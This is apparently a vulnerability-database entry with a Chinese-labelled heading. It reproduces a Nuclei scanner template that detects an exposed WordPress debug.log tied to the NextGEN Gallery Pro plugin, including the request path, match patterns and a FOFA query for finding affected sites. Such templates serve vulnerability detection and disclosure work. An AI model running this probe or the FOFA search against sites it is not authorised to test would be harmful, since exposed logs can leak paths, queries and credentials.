漏洞描述
The NextGEN Gallery Pro plugin for WordPress may expose debug/error log files that contain sensitive information including file paths, database queries, and potentially credentials. These log files are accessible without authentication.
nextgen-gallery-pro-error-log: WordPress NextGEN Gallery Pro - Error Log Disclosure
PoC代码[已公开]
id: nextgen-gallery-pro-error-log
info:
name: WordPress NextGEN Gallery Pro - Error Log Disclosure
author: ritikchaddha
severity: medium
description: |
The NextGEN Gallery Pro plugin for WordPress may expose debug/error log files that contain sensitive information including file paths, database queries, and potentially credentials. These log files are accessible without authentication.
reference:
- https://wpscan.com/plugin/nextgen-gallery/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-nextgen-gallery-wordpress-gallery-information-disclosure-1-9-11/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-532
metadata:
verified: true
fofa-query: body="/plugins/nextgen-gallery-pro"
tags: wordpress,wp,wp-plugin,nextgen-gallery-pro,log,exposure
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
matchers:
- type: word
part: body
words:
- "nextgen"
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-content/debug.log"
matchers:
- type: dsl
dsl:
- 'regex("[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP", body)'
- 'contains_any(body, "PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100a7313133e65a3fa6d843ba22f76663d160e50ec7cbe071f7f1b779b004e364ca022100d07cfc10a4ba662e75fc44d155dc139c77d0b68e4a09b0811bc821ebb3650967:922c64590222798bb761d5b6d8e72950